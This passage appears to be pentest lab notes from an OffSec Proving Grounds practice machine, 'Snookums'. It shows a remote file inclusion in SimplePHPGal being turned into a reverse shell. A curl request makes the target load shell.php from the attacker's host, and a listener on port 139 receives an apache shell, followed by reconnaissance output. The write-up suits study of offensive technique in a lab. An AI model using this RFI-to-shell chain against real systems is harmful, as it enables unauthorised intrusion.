Remote File Inclusion
The target web application instance, simplephphgal, has been confirmed to be vulnerable to remote file inclusion(RFI)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/snookums]
└─$ curl -I http://$IP/image.php?img=http://$tun0/shell.phpSending the payload
/Practice/Snookums/3-Exploitation/attachments/{DADC6E2F-1584-48E4-A992-DB7F29BA2A7C}.png)
Hit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/snookums]
└─$ nnc 139
listening on [any] 139 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.132.58] 49944
SOCKET: Shell has connected! PID: 10512
whoami
apache
hostname
snookums
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:ba:d9 brd ff:ff:ff:ff:ff:ff
inet 192.168.132.58/24 brd 192.168.132.255 scope global ens192
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the apache account via RFI to RCE